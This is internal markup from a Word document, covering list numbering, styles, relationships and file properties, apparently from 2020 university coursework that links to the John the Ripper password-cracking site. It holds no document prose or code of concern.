    <w:lvl w:ilvl="2" w:tplc="2BD28CD4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3922" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2040A7B4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4845" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3B00D3BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5768" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="10969C36">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6691" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="729C30B6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7614" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="24728714">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8537" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="78B88998">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9460" w:hanging="360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358"/>
    <w:rsid w:val="00246F7D"/>
    <w:rsid w:val="00280B8F"/>
    <w:rsid w:val="006E4E04"/>
    <w:rsid w:val="008B5358"/>
    <w:rsid w:val="00927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4D2B9A"/>
  <w15:docId w15:val="{87E83A87-2357-4601-A6EB-58FBF3B68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840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spacing w:before="120"/>
      <w:ind w:left="2280" w:hanging="360"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i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44"/>
      <w:ind w:left="4876" w:right="1616" w:firstLine="2558"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Carlito" w:eastAsia="Carlito" w:hAnsi="Carlito" w:cs="Carlito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spacing w:before="120"/>
      <w:ind w:left="1560" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="118"/>
      <w:ind w:left="704"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1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1.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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oter" Target="footer1.xml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image" Target="media/image23.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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header" Target="header1.xml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hyperlink" Target="http://www.openwall.com/john/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png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jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:laurent.gaffie@gmail.co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1348</Words>
  <Characters>7689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Module Leader: Carlene Campbell</dc:creator>
  <cp:lastModifiedBy>Elliot Barnett (1801749)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-18T21:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-18T21:15:00Z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2020-11-12T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Acrobat PDFMaker 18 for Word</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2020-11-18T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>